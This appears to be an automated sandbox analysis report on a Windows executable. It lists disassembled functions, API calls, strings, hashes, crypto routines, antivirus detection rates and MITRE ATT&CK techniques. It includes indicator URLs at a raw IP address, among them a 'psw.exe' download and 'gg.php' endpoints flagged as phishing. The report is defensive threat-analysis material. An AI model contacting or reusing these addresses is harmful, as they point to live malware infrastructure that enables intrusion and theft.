Instruction ID: 7d641117a018b12b38384406e78f32a94ffa156909b4f6e9ef4ff93778959e8d
Opcode Fuzzy Hash: 37a553c7527bd543dc6276df0fd9bd9768d557c111b77fafda1d1b197a3b9ba2
Instruction Fuzzy Hash: 97410822A183C247FB64B729D40137AA660FFA27A4F50427CEE7C06AD5DF7CE4418790

Function 00007FF7F1301948 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7F13019F2
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF7F1301A1B

Strings

csm, xrefs: 00007FF7F1301B1B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 983355fe70a118a201ee6b154a3b4dc70e69ec82075dc0b3f9cee40ae7098288
Instruction ID: a8d13491ea15add78219d353a405a453b31efd10cb45c96cf1c64722d450ad14
Opcode Fuzzy Hash: 983355fe70a118a201ee6b154a3b4dc70e69ec82075dc0b3f9cee40ae7098288
Instruction Fuzzy Hash: 24515C33B18B4187E724AB55E08026EB7E4FB89B94F500138EBAD47B95DF78E460CB50

Function 00007FF7F12CE120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

select/poll on SSL/TLS socket, errno: %d, xrefs: 00007FF7F12CE262
SSL/TLS connection timeout, xrefs: 00007FF7F12CE286

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
API String ID: 0-3791222319
Opcode ID: 9728ec57a8b6dc9e8df3295354214f157902797ebfe5cf179fe86f855c5db0cc
Instruction ID: 84c799b9e2cdd6d620c19dd0637678fbbc016922026a95a053ff1ffc93b6e0f7
Opcode Fuzzy Hash: 9728ec57a8b6dc9e8df3295354214f157902797ebfe5cf179fe86f855c5db0cc
Instruction Fuzzy Hash: 1041A331B086428AFB24EAA5550037DAB92AF55BB4F500230DF78977D5EFBDE401E3A1

Function 00007FF7F12F53F5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F56C0

Strings

GMT, xrefs: 00007FF7F12F545A
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s, xrefs: 00007FF7F12F54B8

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: %u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT
API String ID: 356670603-632690687
Opcode ID: 8d8ecf81a9b54caeca7e35ffe43549cd2122f8e82b3cf4901bbedd6dd3d04f51
Instruction ID: 9636d81039c6fe47d0ce449c95ad03c664eb0fc37599f3bd3ced0ab0b0374def
Opcode Fuzzy Hash: 8d8ecf81a9b54caeca7e35ffe43549cd2122f8e82b3cf4901bbedd6dd3d04f51
Instruction Fuzzy Hash: 1841B922B1DB9746FB14ABA495501B9E791EF01384FC44031DABE876D5DFACE901CBE0

Function 00007FF7F13136EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131371E

Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F12FA0A5), ref: 00007FF7F131373C

Strings

C:\Users\user\Desktop\CwQQqCmqkY.exe, xrefs: 00007FF7F131372A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\CwQQqCmqkY.exe
API String ID: 3580290477-871237861
Opcode ID: 70e68d63190dd7d42ae22c2bbe47d69c5823176e76e8a640f97d9137ae306624
Instruction ID: d5fe212c7291729365616099c00a450bebbcb55046b56119d4058ecfe68c284a
Opcode Fuzzy Hash: 70e68d63190dd7d42ae22c2bbe47d69c5823176e76e8a640f97d9137ae306624
Instruction Fuzzy Hash: 04417F36E08A0687EB15FF21A4500B9A7A4EF447B4F96403DE92E53BC5DF7CE45583A0

Function 00007FF7F1327D44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327D7A

Part of subcall function 00007FF7F131B71C: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7F131B75C

Strings

:, xrefs: 00007FF7F1327DBA
., xrefs: 00007FF7F1327DCB

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 479fa97cf75959233c02aa414595ef90de64ce64c51a8ac9b9c6db666e49bdd9
Instruction ID: 4af372435ec62465579c494e318656d8f18153cbb7f0ee3174feda1e81b3b7a0
Opcode Fuzzy Hash: 479fa97cf75959233c02aa414595ef90de64ce64c51a8ac9b9c6db666e49bdd9
Instruction Fuzzy Hash: D2414F23F047928AF711BBB098501FC6BB47F25758F940039DE5D67AC9EFB8A44283A1

Function 00007FF7F13174F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7F1317607
GetLastError.KERNEL32 ref: 00007FF7F1317629

Strings

U, xrefs: 00007FF7F13175B3

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 6e8563c5b4ddc9b5cb7fffe8ac04eb9d292b14906fe36700204e3e4ae3b93c0c
Instruction ID: 57876d9818cc76998e9622e231ad90566def98bd2a4a1fac2a7df95b539078d4
Opcode Fuzzy Hash: 6e8563c5b4ddc9b5cb7fffe8ac04eb9d292b14906fe36700204e3e4ae3b93c0c
Instruction Fuzzy Hash: F241C532B18A8582DB20EF25E4447A9B7A0FB88794F854035EE5D97794DFBCE441C790

Function 00007FF7F12F529D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F56C0

Strings

%s%x, xrefs: 00007FF7F12F5328
%02x:, xrefs: 00007FF7F12F52CD

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: %02x:$%s%x
API String ID: 356670603-2591467423
Opcode ID: d2878c648100b2881ed4bfe436baa5d0c478045c5434fad2aa667b7296cdf4c3
Instruction ID: 657440fb34a7677f3e382b04ae36d71e1f428910faebe344155b1c5c7b178895
Opcode Fuzzy Hash: d2878c648100b2881ed4bfe436baa5d0c478045c5434fad2aa667b7296cdf4c3
Instruction Fuzzy Hash: 6431D421B1C6974AFB10B7A495101B8EA92EF01794FC44031CA7EC6ADADFDDE90187E0

Function 00007FF7F12D26F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

recvfrom.WS2_32 ref: 00007FF7F12D2752

Strings

Internal error: Unexpected packet, xrefs: 00007FF7F12D28D7
Received too short packet, xrefs: 00007FF7F12D279B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: recvfrom
String ID: Internal error: Unexpected packet$Received too short packet
API String ID: 846543921-1028201440
Opcode ID: 8210a76b63fd3a0f6975eccaac57bf1e9065c2e58e6301ce707c276d9f40b9c7
Instruction ID: 00dd834471d336f40b54bb56508a1281e3967f37fef6ab841d8ab9531a5868bf
Opcode Fuzzy Hash: 8210a76b63fd3a0f6975eccaac57bf1e9065c2e58e6301ce707c276d9f40b9c7
Instruction Fuzzy Hash: 8D31D272B0868197EB58AB65D5407F9B360FB84740F804036DB6D83B91DF7CE064CB90

Function 00007FF7F131B71C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7F131B75C
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7F131B7AE

Strings

:, xrefs: 00007FF7F131B772

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 5ec83d298f407259a771167eb92e0c40f156219ea944346157fe9a0b9e2eb34d
Instruction ID: 0a801e26c9458a96d7b87e9824256e511a1a31e4cbf8c74a058b82edad644df2
Opcode Fuzzy Hash: 5ec83d298f407259a771167eb92e0c40f156219ea944346157fe9a0b9e2eb34d
Instruction Fuzzy Hash: 1B21A222E0864182EB20AB15D04427DA3B5FF88B54FCA4039DAAD532C8DFBCE95587E1

Function 00007FF7F132D8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS ref: 00007FF7F132D8D2
GdipGetImageEncoders.GDIPLUS ref: 00007FF7F132D8FA

Strings

image/jpeg, xrefs: 00007FF7F132D90A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/jpeg
API String ID: 864223233-3785015651
Opcode ID: 364082913471cc1bce98faaa2a27da98f1b88bbe6c8586cf350d8ce91eef34fa
Instruction ID: af85272512aa26895fcb5bf72befbae966bff7944654ca3b524b6b5475254c13
Opcode Fuzzy Hash: 364082913471cc1bce98faaa2a27da98f1b88bbe6c8586cf350d8ce91eef34fa
Instruction Fuzzy Hash: CF117222B0868187E745BB15D84027CA7A1FFC5B94F954138EA6D473D5DFBCE881C7A0

Function 00007FF7F12F5724 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F5751

Strings

FALSE, xrefs: 00007FF7F12F5743
TRUE, xrefs: 00007FF7F12F573C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: FALSE$TRUE
API String ID: 356670603-1412513891
Opcode ID: f57f590c7a645efb81a6b283e02ee9fa9dc9ace802bd093afb5acd33ec3bd2f8
Instruction ID: 2defa8020c94718c5cb5672e68ff53cf52c22802c947dc8997cbce2c9fec51d8
Opcode Fuzzy Hash: f57f590c7a645efb81a6b283e02ee9fa9dc9ace802bd093afb5acd33ec3bd2f8
Instruction Fuzzy Hash: E8118E22B08B5685FB10ABA4D4403E9A760FB05798FC00036DE2D977C8DFADE585C7E0

Function 00007FF7F12B7920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 00007FF7F12B79AA
setsockopt.WS2_32 ref: 00007FF7F12B79D9

Part of subcall function 00007FF7F12ED430: GetModuleHandleA.KERNEL32 ref: 00007FF7F12ED476
Part of subcall function 00007FF7F12ED430: GetProcAddress.KERNEL32 ref: 00007FF7F12ED486

Strings

@, xrefs: 00007FF7F12B792F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AddressHandleModuleProcgetsockoptsetsockopt
String ID: @
API String ID: 1224256098-2726393805
Opcode ID: 06bfb4e12416a55a223a168bbc2d61aaa1b3c69214bf1b0d0a235fc5a93a684e
Instruction ID: a3e476d4a33488b77d8b4c2eda46ad48ff6bf0028dd7942c1302c2125a9b75e2
Opcode Fuzzy Hash: 06bfb4e12416a55a223a168bbc2d61aaa1b3c69214bf1b0d0a235fc5a93a684e
Instruction Fuzzy Hash: 6A11827161864287F720DF58E404766E790EF89384F900039EB9886BE4EBFDE588DB54

Function 00007FF7F12FF300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7F12FB6A6), ref: 00007FF7F12FF350
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7F12FB6A6), ref: 00007FF7F12FF391

Strings

csm, xrefs: 00007FF7F12FF37E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 5f6c5fd28280d0b02f5447f45ce21c084bfd2a21dcf626562afa2701c58c8ecf
Instruction ID: 1be1a9a74b8074e7542ac7c72092ae4c505c5399c65e3308e960c9fff887365b
Opcode Fuzzy Hash: 5f6c5fd28280d0b02f5447f45ce21c084bfd2a21dcf626562afa2701c58c8ecf
Instruction Fuzzy Hash: 05116A32718B8182EB659F15F400269B7E1FB88B94F984234EEAC47BA8DF7CD5518B40

Function 00007FF7F1289910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F1289927
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7F1289966

Part of subcall function 00007FF7F12FBA20: _Yarn.LIBCPMT ref: 00007FF7F12FBA4E

Strings

bad locale name, xrefs: 00007FF7F128997A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
String ID: bad locale name
API String ID: 1838369231-1405518554
Opcode ID: 410544f41d4b5e3e6b714d04c352ed36dece5a0e14acac82e9e59760611a0e7b
Instruction ID: b88860400f8b856b5ee0657808cda731b36835f8d46e12f8b858cb44c933d11e
Opcode Fuzzy Hash: 410544f41d4b5e3e6b714d04c352ed36dece5a0e14acac82e9e59760611a0e7b
Instruction Fuzzy Hash: 8701A222606B818AC744EFB5A88016CB7A5FB58B84F585139CBACC375EEF38C490C390

Function 00007FF7F1327EB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327EE0
GetDriveTypeW.KERNEL32 ref: 00007FF7F1327F20

Strings

:, xrefs: 00007FF7F1327F09

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: af85d741f3db546a8d84b983b8825c1f588caf6b7c6837e14d3c8fbfda4b5940
Instruction ID: 72c38fba61c8eb6d2f8c7ad2ca01a971f950aac5140fa650d503d2cdf6c4b3b8
Opcode Fuzzy Hash: af85d741f3db546a8d84b983b8825c1f588caf6b7c6837e14d3c8fbfda4b5940
Instruction Fuzzy Hash: 7E01B121A1828387E720BF60946127EE3A0FF55748FC40039D96D826C5DFACE90486B4

Source: http://185.81.68.147/gg.phps64	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/gg.php	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/psw.exe	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/gg.phpReflectiveLoader	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/gg.phpspace	Avira URL Cloud: Label: phishing

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F7650 CryptHashData,	0_2_00007FF7F12F7650
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F7660 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_00007FF7F12F7660
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F75D0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	0_2_00007FF7F12F75D0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F1AA0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertFreeCertificateContext,	0_2_00007FF7F12F1AA0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F7B50 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	0_2_00007FF7F12F7B50
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F1EC0 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	0_2_00007FF7F12F1EC0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F9F20 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_00007FF7F12F9F20
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F23F0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	0_2_00007FF7F12F23F0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12CCC50 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_00007FF7F12CCC50
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F8EC0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	0_2_00007FF7F12F8EC0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F8F40 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_00007FF7F12F8F40
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12F8FD0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_00007FF7F12F8FD0

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: -----BEGIN PUBLIC KEY-----		0_2_00007FF7F12A7930
Source: CwQQqCmqkY.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: CwQQqCmqkY.exe	Virustotal: Detection: 26%			Perma Link
Source: CwQQqCmqkY.exe	ReversingLabs: Detection: 52%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

